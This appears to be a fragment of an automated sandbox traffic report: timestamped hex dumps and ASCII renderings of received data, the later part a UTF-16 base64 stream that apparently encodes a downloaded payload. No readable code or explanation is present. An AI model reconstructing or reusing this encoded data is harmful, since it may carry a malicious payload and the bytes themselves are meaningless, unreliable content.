                                                                                                                                                                                                          2021-12-31 18:23:00 UTC190INData Raw: e1 7f 81 9e eb 3d 2e d2 1d f8 84 74 98 ca a8 00 6d 5e b2 7e 35 0d 8e d0 8d 04 2f dd 0f 0a ea d9 39 5b 69 24 95 e2 d4 e3 16 b8 49 50 3f 0b e6 58 8e e5 b4 0b 72 b3 71 a4 65 b4 db e7 54 83 0d d7 5f 25 d4 c1 32 51 bb 37 7f 47 fe 27 2c 1b 1b b5 b0 00 06 a7 f2 b3 53 01 6f fc 7a 88 4b 12 1c 8c 61 09 b0 a6 97 75 cf 49 ca fc 9e 66 87 fa 17 74 b5 85 ed a7 17 4a f8 aa e8 67 6d 8f f4 5b a9 57 aa b3 e8 fe 1a cd 48 01 73 15 60 c2 b8 2a 5d 51 73 dd 3f 0d 4f ff b0 7b 47 f3 7e 29 b3 89 6a ee 12 1d d8 93 0e 5b 4e 7a 20 36 8e 7d 2d 85 72 ac 62 d1 c1 90 3b 66 13 ab f4 3e 8a 29 01 6b b7 aa 1f 0b c4 44 b9 36 9f ee a4 a8 4d 7d 65 31 4c 44 e8 af 3c 70 c7 35 db cc 7a ce 6f 6e 7a 94 b8 80 44 40 ed d4 9c 0f 72 87 64 5b c8 8e a2 0e b7 3d 74 ae 39 b9 91 82 a4 fe b7 ae 3f 40 d4 90 86
                                                                                                                                                                                                          Data Ascii: =.tm^~5/9[i$IP?XrqeT_%2Q7G',SozKauIftJgm[WHs`*]Qs?O{G~)j[Nz 6}-rb;f>)kD6M}e1LD<p5zonzD@rd[=t9?@
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC193INData Raw: e4 9e 94 84 7d ec 6d 62 3f a0 fe ff 68 41 cc 85 01 e2 0d 6e 37 6b 3f 49 33 89 ea 14 4a 20 ef 50 72 14 68 6b 53 03 a8 46 53 6d f3 8e 50 fe ba 04 dd ea 07 c0 1f bf 8e a4 96 73 a4 b5 12 03 3c 37 74 4e 4c cf 44 30 43 41 9c 13 75 d4 da d8 91 54 29 d9 7a ef 4b db 30 bd a7 25 d4 1d bd ea af 13 20 f1 4f 23 77 ab cf b0 43 06 7f bd ca c3 e6 41 14 99 c4 85 dc 5c 23 55 4b 66 25 60 12 92 c4 0c af c9 f1 32 06 eb 30 81 83 f3 2a 89 ec c9 f4 89 c9 20 41 f7 ac 0c 33 63 55 ea 0d f0 6a 36 7e 6c 89 22 2a e6 23 c2 a8 d2 7e 1e d1 21 ad 4f 2d e4 a0 8e 8f 0b af 5d ce 18 de 98 a4 cd 07 9d 5a 7e b4 4a cc 2d b5 00 52 65 29 ad 48 e6 8d 6b 43 42 3f cd 1b 88 70 72 6a 44 2d f4 8b 46 8a e4 dd b0 47 f9 ac e9 1b 28 51 3e 53 0b b9 69 59 24 b1 51 f5 fb 2f 8b 32 e2 64 69 88 23 cc da e5 92 9c
                                                                                                                                                                                                          Data Ascii: }mb?hAn7k?I3J PrhkSFSmPs<7tNLD0CAuT)zK0% O#wCA\#UKf%`20* A3cUj6~l"*#~!O-]Z~J-Re)HkCB?prjD-FG(Q>SiY$Q/2di#
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC197INData Raw: 43 e9 37 3a 73 a9 5a ac 98 22 8c 0b 1f 50 f7 4b fe f9 03 b6 c3 70 95 1a 88 92 dd c7 8e da a7 94 61 d5 4c fc eb fa 36 16 87 89 b2 09 0e c8 00 93 99 b9 6a 0e 31 ed 1d be 63 1c f4 c9 5f a1 b3 d9 fc 4a de 9d 49 e1 e3 79 a0 a1 0d 88 1d 41 28 9c 7e d8 57 1e c4 c4 07 2c da f1 c1 a9 e5 5a 4e c7 af 54 bf f5 68 8d fb b4 92 29 26 db 61 a2 be 77 4d f4 a1 b0 0f 9e 4e 1f 18 8b 6e f2 df b3 a3 43 45 fd be 39 88 1a 26 38 db b8 ea 5f ab 4b 51 f1 09 43 c3 22 e0 72 83 7f 3e 06 5d d9 fd 4e 0a 1f bb c7 7f a4 58 a2 84 4b b7 38 d7 f1 96 0d c4 be 2a 60 49 46 9a ec 00 d0 e0 d6 bd 4d 1b 42 51 8f c5 0e b8 c5 fb 6f 13 72 29 b0 4c 20 e8 2a 12 ea 20 d4 2e a1 b6 93 2f 91 20 91 8a 6f 00 d9 cd bb 4a 89 9f 44 1c ae a2 be 17 21 c6 fb be 59 0e f5 61 bf 79 25 bd 03 98 69 2e e4 22 cb 97 a0 33
                                                                                                                                                                                                          Data Ascii: C7:sZ"PKpaL6j1c_JIyA(~W,ZNTh)&awMNnCE9&8_KQC"r>]NXK8*`IFMBQor)L * ./ oJD!Yay%i."3
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC201INData Raw: b9 28 2d 6a 1f ac d5 c4 e6 d2 0d fc 33 ef 9a 6a 3e 9e 91 55 3a 57 33 0e 74 ce ac d6 76 f3 29 ae 37 5f b7 e2 33 3a 34 06 02 b3 ee 7d 8e d4 ad 29 e2 1b c9 c4 2d 97 4b c2 ea 44 0c 79 85 43 43 7c 30 eb c4 f7 f6 ff a0 48 c8 4d 92 f4 f7 49 18 df 95 48 dc 5a 73 06 83 2f 19 40 71 fd 03 f4 e2 64 9a 05 d2 4d 06 51 dd 17 38 ec 64 ac e8 f8 d1 6f 24 a1 5f a6 45 d8 1d 4b 7e 9d 56 c2 27 06 2a 5a e4 57 2f 94 1a 15 b4 a6 81 dc bd 2a 86 1e d5 5d 6b ac 6a 73 fa fd 07 3c 9d ac b1 b9 f8 cb 63 be 44 9e a8 69 6f 2f f4 48 52 4f 95 37 71 d1 1c 7c 97 ce 1a f9 e8 d5 36 99 c3 a9 cf 0b d4 04 c0 ab 4a 55 c5 d7 5f 75 39 7e 84 33 8a bd 84 e8 bb c1 f2 96 d1 ab 15 95 8e 73 99 7e 37 8b 4b 5f ca a4 95 68 33 b9 35 43 86 f8 1b 09 0e e3 88 ac a3 e5 3c 3c 2a 50 95 65 11 85 66 4e 64 e7 be 6b c8
                                                                                                                                                                                                          Data Ascii: (-j3j>U:W3tv)7_3:4})-KDyCC|0HMIHZs/@qdMQ8do$_EK~V'*ZW/*]kjs<cDio/HRO7q|6JU_u9~3s~7K_h35C<<*PefNdk
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC206INData Raw: 60 35 56 21 0c 6e 0b 82 06 cf b5 92 26 89 83 ef 28 6f 4a 52 70 fa 43 c5 a8 99 3c ab 97 0a 84 19 0e 34 e8 1f 14 7b 02 46 92 cf ac c6 b4 3a aa a5 d8 02 d7 7d b1 9b 01 2c a5 97 6b 8c 26 7c 9a c3 ee 24 6d 15 cb ec d7 82 02 b5 5d d2 9d 41 e0 d8 16 36 f5 1d a8 a7 6a b1 cd cb f7 b9 a8 03 e0 fc 61 9c 81 98 fa 4e 90 61 6e 03 69 b0 16 b2 cd d6 21 5f c7 35 86 6a 51 f8 57 ba f8 3e 9d 96 17 2f f6 78 30 8b d7 06 01 e7 49 10 d8 8b b1 66 48 60 12 4f 55 94 7d 1c 49 4e 0f a5 e1 2c f9 32 78 af dc 68 70 a4 d0 f6 ac 1b 54 ee ca 80 a3 e5 e0 74 80 bc ae b8 c1 56 8c 49 c5 cf 82 8a d2 ce b1 65 a3 f5 31 ef c6 2d 02 27 1a 41 4c f7 85 33 13 e8 fd 00 09 e7 c0 53 f7 9d 73 f9 1d aa ac 19 71 8a 26 db c3 0f 35 f3 22 50 73 2c 7e e3 cd 38 19 2a 93 0c a1 b3 84 22 3c eb d3 99 6e a1 40 87 b9
                                                                                                                                                                                                          Data Ascii: `5V!n&(oJRpC<4{F:},k&|$m]A6jaNani!_5jQW>/x0IfH`OU}IN,2xhpTtVIe1-'AL3Ssq&5"Ps,~8*"<n@
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC210INData Raw: 57 cd e6 43 9d 63 09 76 81 37 03 bb 3e a1 8a 82 a9 59 0a a8 63 1f a7 9a 66 59 00 c6 0d 68 8d ae e1 be c6 67 f3 28 9a 9b 9c 9b 1b 0e 34 72 99 4c 83 04 23 b7 c7 77 84 11 03 7b 61 83 80 59 78 fa af 19 db ca 9a d4 48 cd 7e 3d 6c d6 26 36 fe 5f be f0 2c 6c b7 53 04 71 6b 9f 1f 67 70 35 c9 01 f1 eb 57 cf 14 8b b7 5c f7 2e 7d 12 7d b8 36 9d ee 7b 5a 40 8f 9a 5d b8 05 82 c4 50 b7 9d 3b 9a cc 18 e7 51 b1 ac 0a c5 af 65 d1 d9 01 3c 00 80 59 1f 2d 14 a7 9d 30 e4 91 c2 c9 ef 33 b3 08 fb 0c c1 63 1f 72 42 6b a9 10 9b a9 89 ee 4c a0 64 a8 e7 b3 f0 11 a0 50 03 25 25 09 70 1b d5 9b 2a 90 4f e7 89 2d b4 0a bc ea d3 84 64 39 07 54 75 77 46 06 e5 47 a9 34 5e f0 f3 20 a6 f9 1e d5 b0 d9 d2 64 93 7f 73 0a 55 65 93 5b 45 43 02 f0 b5 27 cc 15 90 80 0d b0 76 b8 7b 99 77 a8 ac 5e
                                                                                                                                                                                                          Data Ascii: WCcv7>YcfYhg(4rL#w{aYxH~=l&6_,lSqkgp5W\.}}6{Z@]P;Qe<Y-03crBkLdP%%p*O-d9TuwFG4^ dsUe[EC'v{w^
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC214INData Raw: 09 54 6d 2c 28 72 be 14 ed 07 14 73 ec df 69 7b 09 25 db b1 54 a4 0f 6b 00 c3 88 29 d0 c3 f6 9a dc 30 90 35 be ff b7 9c 97 d3 2e be a3 ef 3a f0 a3 8e 0d 2b cc 3e 85 c6 a7 64 74 c8 a4 5d 77 36 7e fa 50 ed e4 cd 45 1c ae 9e 0a 7e 2b 4b d7 83 df 26 6b a6 1e b1 94 1b a9 b6 ce d2 f9 d8 a2 31 cd 23 5d df 00 1b c8 d9 46 a3 2e 68 15 1d 4c f0 f0 53 25 cc 51 4b 47 7c 77 96 f8 f9 5f 79 5f fd 8b fc 13 62 c7 28 c3 9e e6 4d df 22 7d 6e e4 8f be 4d 92 b6 7b ce 12 bc 6b 6f 00 0c fa 41 53 43 e4 bc 79 c1 a7 d1 1d 8f 7c cc bf 53 a5 fd ff 2a 05 f6 1a c9 5d e8 c6 eb a8 53 6a 67 b1 38 a7 2b 7c 84 9c fa b1 8a 42 37 34 0f 73 ee 3b 1f 8f c6 66 80 8e 66 72 6a 56 a0 0e d2 da 87 c6 3a 79 e2 50 43 a7 01 42 f5 b1 9a 98 1c 8e 7a 52 47 1e 5b 39 e6 51 04 54 7e e3 95 fc ed 22 9b 17 6f 87
                                                                                                                                                                                                          Data Ascii: Tm,(rsi{%Tk)05.:+>dt]w6~PE~+K&k1#]F.hLS%QKG|w_y_b(M"}nM{koASCy|S*]Sjg8+|B74s;ffrjV:yPCBzRG[9QT~"o
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC225INData Raw: 6f cb 45 56 83 2f cc 81 aa 39 dc 53 cb 3a 8c d5 86 41 89 84 7a ce 77 a4 09 c2 b1 87 02 35 52 4e 2f 28 56 55 cf 1f 8e 6f c0 97 d6 ab 2d 40 50 a8 7b 17 8f 91 60 81 1e e9 40 18 c3 e3 3c 95 9e fc fb c9 46 5a f1 37 da 48 60 0c 1f 5f df f2 70 6a eb ed 31 3f ba 23 70 1b 97 98 e6 7a 27 53 43 ce 1f d8 df 9e 6f 4e 10 b9 81 29 df ac 0b 98 ef 29 d8 43 fa 14 b5 00 aa b8 0c f0 b8 ae b5 a2 9e e9 e5 36 ff 61 96 02 1d 7f 21 53 66 4e ab e2 1a fd b6 c2 4f 88 4e 4a 8f d2 5c 74 19 3e 73 de 34 6b 11 e9 ca c1 21 13 e0 10 65 f3 20 39 e7 58 cd a1 7f 80 eb 82 f2 03 c0 09 66 6e 4a a7 63 35 56 29 a2 7a f6 63 90 50 86 b0 f1 14 46 c9 3a 69 98 f6 31 ee 10 14 0e 9e db 1f 7d b3 03 09 0f e6 50 1b ed 99 31 26 b3 08 ce df dd 23 49 aa d0 51 24 ca 08 43 3a bb 76 81 16 5a 69 75 e4 4c 19 a7 eb
                                                                                                                                                                                                          Data Ascii: oEV/9S:Azw5RN/(VUo-@P{`@<FZ7H`_pj1?#pz'SCoN))C6a!SfNONJ\t>s4k!e 9XfnJc5V)zcPF:i1}P1&#IQ$C:vZiuL
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC230INData Raw: 8d 3d 1a f0 90 ca 45 74 2d f7 ae 0f e6 55 3c 61 d6 4c df a5 6f d8 54 92 a3 39 4b 68 7f 91 90 a3 52 1b 6f de 17 e5 45 3b 98 b1 00 44 32 d1 70 a5 cd 95 60 3e 9f 06 54 10 70 96 ae 74 5a 4c 24 b2 89 f4 e5 fb 06 53 0f 72 d8 61 28 0e 2d 34 ff f7 b2 e9 8f 74 ab 2d 68 af bd 63 91 9d 11 c7 a2 10 8c eb b2 5d 69 b2 16 53 0e 51 2a dd 82 29 40 e3 ef e9 62 c3 02 ad 99 4c 04 6f 25 2a f8 35 dc 3a 2a b7 a3 47 ee e5 cb e9 cc f7 61 81 38 ab 8e 42 41 f5 de 13 ad 79 2c 2c 82 f8 68 a9 fe 02 23 01 98 44 bb 9f 79 26 a8 eb 7b 11 6c ff 5c 6f b5 a7 2b 01 5b 9b 5c 32 ca 97 5c 65 5e 07 50 90 20 44 b5 b1 b6 70 1c d1 f0 f4 af da 49 7d e0 d8 36 79 2c 71 79 1f ed 18 3e 20 dc f9 61 3d 0f 51 1e d9 21 90 25 7d 7a 80 39 a9 d9 ca bb e4 95 60 86 c2 a0 11 21 1f cc 1d be 90 b8 57 92 f9 00 df df
                                                                                                                                                                                                          Data Ascii: =Et-U<aLoT9KhRoE;D2p`>TptZL$Sra(-4t-hc]iSQ*)@bLo%*5:*Ga8BAy,,h#Dy&{l\o+[\2\e^P DpI}6y,qy> a=Q!%}z9`!W
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC246INData Raw: 40 c9 59 55 d9 bf be 79 8a c4 b7 ce c4 74 59 96 eb 37 bf b7 5e 39 65 58 ed ad bd 38 33 af f4 d8 db 54 a8 8e 55 f0 e9 10 c7 b1 e2 67 98 87 ef ef 0b ee e2 d3 64 bb 94 60 21 cb 2b fa e7 21 ab 32 27 cf 1e 11 e5 67 a8 08 07 9e 2f 54 4e 20 db b2 87 be 8c 7b 79 d3 71 0b 87 9a c2 7a 09 da 23 4c 55 e2 a5 51 fc 54 1f 12 6d ce 30 fd 9f 77 b2 32 3d 49 14 58 ea 92 b8 3c c5 75 e7 9d d9 fd 33 40 90 29 49 5b 15 6f 1e a1 a6 83 9e 85 77 c5 00 9b de 5c 99 be be ea 80 23 90 fe 7f 68 05 0e 51 21 4c 67 32 e0 e1 29 b3 61 29 90 4c b2 07 1a 95 33 79 55 f0 1c 2b 3b 7d fd 4c d4 c2 e5 61 0a 71 96 e9 eb 83 ec c6 02 b9 d6 3e 88 1f bb 6f 99 f2 a0 76 f4 c0 66 d4 d7 1c d3 be 61 bc b4 d9 0d a8 c5 b4 0d 40 b0 f1 5c cd c9 c5 e3 6a c7 89 ce d1 b3 88 57 c1 46 42 9d 2e b8 33 fd 25 0c e1 b7 b6
                                                                                                                                                                                                          Data Ascii: @YUytY7^9eX83TUgd`!+!2'g/TN {yqz#LUQTm0w2=IX<u3@)I[ow\#hQ!Lg2)a)L3yU+;}Laq>ovfa@\jWFB.3%
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC257INData Raw: 00 33 00 56 00 39 00 36 00 59 00 35 00 30 00 53 00 51 00 6b 00 4a 00 31 00 66 00 48 00 4d 00 2f 00 38 00 45 00 55 00 75 00 57 00 69 00 76 00 4b 00 4e 00 51 00 2f 00 6e 00 47 00 34 00 68 00 6c 00 79 00 48 00 63 00 32 00 6b 00 6a 00 34 00 49 00 2b 00 35 00 68 00 61 00 4c 00 43 00 7a 00 73 00 50 00 4d 00 69 00 53 00 78 00 52 00 53 00 4f 00 61 00 72 00 75 00 53 00 72 00 57 00 54 00 43 00 72 00 69 00 33 00 42 00 5a 00 41 00 50 00 6c 00 4a 00 4a 00 2b 00 6b 00 76 00 4b 00 47 00 66 00 6b 00 6f 00 30 00 70 00 45 00 56 00 6f 00 6b 00 43 00 41 00 5a 00 2b 00 76 00 67 00 49 00 53 00 77 00 5a 00 53 00 74 00 32 00 4a 00 74 00 61 00 41 00 6a 00 41 00 79 00 6f 00 45 00 38 00 78 00 55 00 39 00 72 00 53 00 5a 00 77 00 2f 00 79 00 4e 00 62 00 6f 00 71 00 55 00 77 00 70 00
                                                                                                                                                                                                          Data Ascii: 3V96Y50SQkJ1fHM/8EUuWivKNQ/nG4hlyHc2kj4I+5haLCzsPMiSxRSOaruSrWTCri3BZAPlJJ+kvKGfko0pEVokCAZ+vgISwZSt2JtaAjAyoE8xU9rSZw/yNboqUwp
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC273INData Raw: 00 45 00 42 00 53 00 54 00 73 00 4d 00 55 00 4d 00 30 00 7a 00 71 00 79 00 43 00 45 00 5a 00 64 00 38 00 68 00 65 00 63 00 35 00 35 00 6f 00 74 00 79 00 32 00 5a 00 48 00 44 00 63 00 73 00 65 00 49 00 52 00 53 00 48 00 4f 00 6f 00 47 00 36 00 44 00 4b 00 41 00 2f 00 76 00 37 00 41 00 72 00 36 00 69 00 70 00 53 00 52 00 2f 00 6f 00 7a 00 6f 00 4c 00 37 00 4c 00 56 00 32 00 4c 00 50 00 4f 00 51 00 38 00 5a 00 66 00 30 00 72 00 74 00 36 00 77 00 4b 00 65 00 32 00 53 00 64 00 5a 00 45 00 43 00 53 00 4e 00 52 00 51 00 76 00 46 00 7a 00 67 00 64 00 36 00 4e 00 75 00 36 00 77 00 35 00 44 00 41 00 70 00 6b 00 44 00 36 00 76 00 4e 00 50 00 2b 00 74 00 56 00 36 00 53 00 5a 00 6f 00 6a 00 4f 00 35 00 47 00 52 00 59 00 71 00 78 00 58 00 54 00 37 00 33 00 31 00 51 00
                                                                                                                                                                                                          Data Ascii: EBSTsMUM0zqyCEZd8hec55oty2ZHDcseIRSHOoG6DKA/v7Ar6ipSR/ozoL7LV2LPOQ8Zf0rt6wKe2SdZECSNRQvFzgd6Nu6w5DApkD6vNP+tV6SZojO5GRYqxXT731Q
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC289INData Raw: 00 4c 00 42 00 41 00 55 00 7a 00 67 00 78 00 44 00 61 00 75 00 32 00 57 00 2f 00 5a 00 4f 00 65 00 78 00 63 00 69 00 73 00 46 00 7a 00 4d 00 37 00 55 00 4d 00 34 00 4d 00 59 00 6c 00 66 00 48 00 71 00 57 00 72 00 55 00 6d 00 42 00 30 00 78 00 69 00 6d 00 5a 00 2f 00 33 00 45 00 6d 00 48 00 37 00 55 00 58 00 54 00 6f 00 64 00 2f 00 4d 00 71 00 50 00 46 00 70 00 36 00 71 00 72 00 76 00 2f 00 6c 00 7a 00 33 00 30 00 67 00 59 00 63 00 66 00 4c 00 4c 00 33 00 50 00 70 00 4f 00 7a 00 65 00 36 00 78 00 2b 00 4e 00 33 00 73 00 58 00 54 00 46 00 50 00 33 00 66 00 6a 00 54 00 4d 00 55 00 4b 00 71 00 46 00 62 00 66 00 4c 00 6a 00 32 00 63 00 62 00 6a 00 43 00 6e 00 39 00 44 00 4e 00 35 00 75 00 44 00 77 00 33 00 2f 00 62 00 6b 00 6a 00 6c 00 48 00 35 00 30 00 77 00
                                                                                                                                                                                                          Data Ascii: LBAUzgxDau2W/ZOexcisFzM7UM4MYlfHqWrUmB0ximZ/3EmH7UXTod/MqPFp6qrv/lz30gYcfLL3PpOze6x+N3sXTFP3fjTMUKqFbfLj2cbjCn9DN5uDw3/bkjlH50w
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC305INData Raw: 00 53 00 4e 00 75 00 43 00 66 00 6e 00 62 00 42 00 57 00 4f 00 2b 00 2b 00 56 00 47 00 66 00 50 00 67 00 71 00 30 00 79 00 31 00 62 00 42 00 68 00 49 00 37 00 2f 00 53 00 46 00 6b 00 48 00 4e 00 4c 00 37 00 34 00 52 00 44 00 38 00 58 00 32 00 73 00 76 00 4d 00 4d 00 68 00 37 00 38 00 70 00 45 00 41 00 32 00 4f 00 73 00 36 00 6f 00 42 00 55 00 6d 00 59 00 67 00 64 00 41 00 73 00 69 00 49 00 50 00 41 00 6f 00 67 00 34 00 4f 00 75 00 70 00 6a 00 4b 00 59 00 53 00 70 00 67 00 53 00 58 00 66 00 4f 00 51 00 69 00 43 00 75 00 2f 00 67 00 78 00 67 00 64 00 4e 00 78 00 69 00 2b 00 56 00 66 00 78 00 50 00 33 00 38 00 79 00 6c 00 56 00 52 00 69 00 45 00 53 00 41 00 4f 00 36 00 59 00 44 00 2b 00 6b 00 67 00 45 00 63 00 71 00 33 00 6c 00 68 00 75 00 53 00 78 00 34 00
                                                                                                                                                                                                          Data Ascii: SNuCfnbBWO++VGfPgq0y1bBhI7/SFkHNL74RD8X2svMMh78pEA2Os6oBUmYgdAsiIPAog4OupjKYSpgSXfOQiCu/gxgdNxi+VfxP38ylVRiESAO6YD+kgEcq3lhuSx4
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC321INData Raw: 00 75 00 67 00 63 00 71 00 66 00 47 00 59 00 72 00 52 00 57 00 66 00 75 00 43 00 4f 00 51 00 4a 00 6d 00 54 00 67 00 72 00 72 00 72 00 48 00 46 00 47 00 6f 00 5a 00 53 00 50 00 42 00 52 00 59 00 4f 00 4f 00 59 00 46 00 62 00 41 00 74 00 54 00 58 00 2b 00 41 00 48 00 51 00 44 00 41 00 32 00 31 00 77 00 52 00 35 00 47 00 4d 00 48 00 56 00 6d 00 5a 00 55 00 37 00 2f 00 56 00 75 00 42 00 59 00 68 00 47 00 76 00 61 00 69 00 47 00 6f 00 5a 00 36 00 6d 00 53 00 77 00 62 00 6d 00 53 00 30 00 6d 00 66 00 68 00 41 00 67 00 63 00 4c 00 36 00 6f 00 2f 00 30 00 67 00 36 00 7a 00 48 00 51 00 43 00 45 00 4c 00 6c 00 36 00 6d 00 4d 00 4d 00 44 00 53 00 4f 00 77 00 76 00 34 00 76 00 6f 00 5a 00 73 00 42 00 4a 00 2f 00 6e 00 55 00 71 00 45 00 74 00 49 00 55 00 75 00 4b 00
                                                                                                                                                                                                          Data Ascii: ugcqfGYrRWfuCOQJmTgrrrHFGoZSPBRYOOYFbAtTX+AHQDA21wR5GMHVmZU7/VuBYhGvaiGoZ6mSwbmS0mfhAgcL6o/0g6zHQCELl6mMMDSOwv4voZsBJ/nUqEtIUuK
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC337INData Raw: 00 2b 00 4a 00 59 00 58 00 54 00 58 00 44 00 50 00 4d 00 52 00 6b 00 69 00 43 00 68 00 64 00 38 00 67 00 58 00 67 00 31 00 43 00 30 00 43 00 37 00 6a 00 4c 00 31 00 52 00 37 00 50 00 32 00 50 00 5a 00 36 00 32 00 64 00 58 00 37 00 6d 00 59 00 42 00 72 00 4f 00 57 00 41 00 66 00 71 00 46 00 64 00 71 00 2b 00 76 00 30 00 74 00 37 00 30 00 55 00 51 00 6c 00 38 00 43 00 42 00 4f 00 68 00 57 00 55 00 63 00 48 00 63 00 42 00 59 00 34 00 64 00 44 00 44 00 64 00 36 00 61 00 62 00 6e 00 4c 00 4c 00 2f 00 78 00 5a 00 4b 00 48 00 69 00 48 00 55 00 4f 00 47 00 68 00 4e 00 54 00 50 00 4d 00 78 00 2f 00 31 00 64 00 58 00 4b 00 41 00 2f 00 72 00 66 00 4c 00 75 00 53 00 7a 00 43 00 46 00 6b 00 76 00 5a 00 54 00 6c 00 54 00 45 00 75 00 73 00 37 00 64 00 45 00 72 00 5a 00
                                                                                                                                                                                                          Data Ascii: +JYXTXDPMRkiChd8gXg1C0C7jL1R7P2PZ62dX7mYBrOWAfqFdq+v0t70UQl8CBOhWUcHcBY4dDDd6abnLL/xZKHiHUOGhNTPMx/1dXKA/rfLuSzCFkvZTlTEus7dErZ
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC353INData Raw: 00 67 00 50 00 55 00 63 00 57 00 48 00 67 00 5a 00 5a 00 2f 00 65 00 7a 00 68 00 49 00 47 00 4d 00 33 00 70 00 7a 00 44 00 69 00 39 00 32 00 72 00 73 00 44 00 75 00 4e 00 4d 00 6e 00 74 00 70 00 62 00 75 00 6e 00 6c 00 66 00 45 00 69 00 43 00 36 00 37 00 72 00 76 00 6f 00 77 00 7a 00 77 00 48 00 4c 00 37 00 6f 00 56 00 42 00 47 00 44 00 71 00 74 00 74 00 73 00 42 00 67 00 6e 00 39 00 4f 00 79 00 70 00 79 00 77 00 6b 00 5a 00 34 00 44 00 63 00 7a 00 74 00 65 00 31 00 61 00 6f 00 37 00 43 00 4b 00 66 00 52 00 36 00 51 00 72 00 41 00 79 00 62 00 34 00 4c 00 61 00 42 00 53 00 4d 00 65 00 78 00 42 00 47 00 38 00 30 00 41 00 30 00 68 00 67 00 63 00 45 00 49 00 73 00 34 00 4a 00 74 00 69 00 79 00 44 00 65 00 75 00 33 00 48 00 49 00 78 00 2b 00 42 00 6e 00 6f 00
                                                                                                                                                                                                          Data Ascii: gPUcWHgZZ/ezhIGM3pzDi92rsDuNMntpbunlfEiC67rvowzwHL7oVBGDqttsBgn9OypywkZ4Dczte1ao7CKfR6QrAyb4LaBSMexBG80A0hgcEIs4JtiyDeu3HIx+Bno
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC369INData Raw: 00 79 00 33 00 76 00 45 00 6e 00 4b 00 38 00 51 00 32 00 33 00 53 00 55 00 74 00 2f 00 44 00 46 00 53 00 33 00 68 00 39 00 43 00 78 00 39 00 4f 00 47 00 39 00 58 00 75 00 64 00 75 00 39 00 32 00 64 00 4f 00 79 00 65 00 32 00 50 00 37 00 44 00 6d 00 69 00 7a 00 56 00 6a 00 52 00 71 00 36 00 74 00 62 00 4c 00 32 00 58 00 72 00 78 00 55 00 58 00 2f 00 75 00 46 00 32 00 74 00 74 00 65 00 6c 00 33 00 46 00 45 00 59 00 4a 00 4a 00 2f 00 73 00 64 00 74 00 68 00 62 00 47 00 6e 00 46 00 45 00 70 00 6c 00 47 00 37 00 32 00 4b 00 65 00 5a 00 42 00 38 00 70 00 38 00 7a 00 7a 00 68 00 39 00 30 00 33 00 6d 00 79 00 45 00 6c 00 64 00 69 00 70 00 7a 00 68 00 71 00 31 00 4a 00 59 00 4f 00 64 00 39 00 6a 00 52 00 79 00 63 00 6c 00 30 00 36 00 4e 00 69 00 50 00 7a 00 32 00
                                                                                                                                                                                                          Data Ascii: y3vEnK8Q23SUt/DFS3h9Cx9OG9Xudu92dOye2P7DmizVjRq6tbL2XrxUX/uF2ttel3FEYJJ/sdthbGnFEplG72KeZB8p8zzh903myEldipzhq1JYOd9jRycl06NiPz2
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC385INData Raw: 00 69 00 6a 00 64 00 31 00 72 00 74 00 6b 00 6b 00 52 00 30 00 33 00 56 00 37 00 35 00 56 00 61 00 6c 00 52 00 55 00 32 00 54 00 72 00 56 00 31 00 46 00 4e 00 38 00 59 00 6b 00 4c 00 48 00 59 00 71 00 45 00 46 00 58 00 32 00 6a 00 5a 00 57 00 42 00 61 00 50 00 4b 00 58 00 67 00 56 00 45 00 76 00 56 00 41 00 4b 00 34 00 53 00 6e 00 6c 00 44 00 7a 00 70 00 69 00 33 00 41 00 75 00 75 00 42 00 6e 00 47 00 39 00 65 00 6d 00 64 00 52 00 6e 00 55 00 5a 00 71 00 67 00 54 00 36 00 30 00 51 00 75 00 48 00 48 00 58 00 67 00 6a 00 35 00 56 00 35 00 5a 00 69 00 32 00 79 00 46 00 46 00 75 00 35 00 30 00 2b 00 52 00 30 00 72 00 4b 00 32 00 6c 00 46 00 79 00 43 00 30 00 4d 00 69 00 49 00 4d 00 78 00 32 00 77 00 6c 00 31 00 37 00 75 00 4e 00 4d 00 73 00 6f 00 77 00 41 00
                                                                                                                                                                                                          Data Ascii: ijd1rtkkR03V75ValRU2TrV1FN8YkLHYqEFX2jZWBaPKXgVEvVAK4SnlDzpi3AuuBnG9emdRnUZqgT60QuHHXgj5V5Zi2yFFu50+R0rK2lFyC0MiIMx2wl17uNMsowA
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC401INData Raw: 00 67 00 44 00 62 00 4d 00 4b 00 4c 00 67 00 55 00 42 00 48 00 34 00 61 00 35 00 4b 00 63 00 46 00 78 00 4d 00 2b 00 66 00 4e 00 46 00 47 00 34 00 54 00 4d 00 42 00 47 00 6f 00 59 00 51 00 4c 00 65 00 79 00 56 00 52 00 6e 00 58 00 38 00 33 00 6f 00 6b 00 77 00 54 00 30 00 73 00 46 00 4a 00 32 00 4a 00 4f 00 79 00 72 00 4c 00 52 00 4b 00 6d 00 54 00 65 00 7a 00 41 00 2b 00 59 00 43 00 53 00 4d 00 72 00 48 00 64 00 65 00 42 00 69 00 6f 00 45 00 65 00 47 00 4d 00 57 00 48 00 69 00 65 00 75 00 62 00 44 00 58 00 63 00 54 00 6a 00 34 00 63 00 37 00 42 00 45 00 53 00 48 00 33 00 75 00 4b 00 6a 00 50 00 63 00 76 00 48 00 49 00 4b 00 55 00 56 00 4d 00 4e 00 64 00 45 00 62 00 5a 00 68 00 6f 00 5a 00 75 00 6a 00 63 00 47 00 30 00 31 00 78 00 4c 00 30 00 53 00 71 00
                                                                                                                                                                                                          Data Ascii: gDbMKLgUBH4a5KcFxM+fNFG4TMBGoYQLeyVRnX83okwT0sFJ2JOyrLRKmTezA+YCSMrHdeBioEeGMWHieubDXcTj4c7BESH3uKjPcvHIKUVMNdEbZhoZujcG01xL0Sq
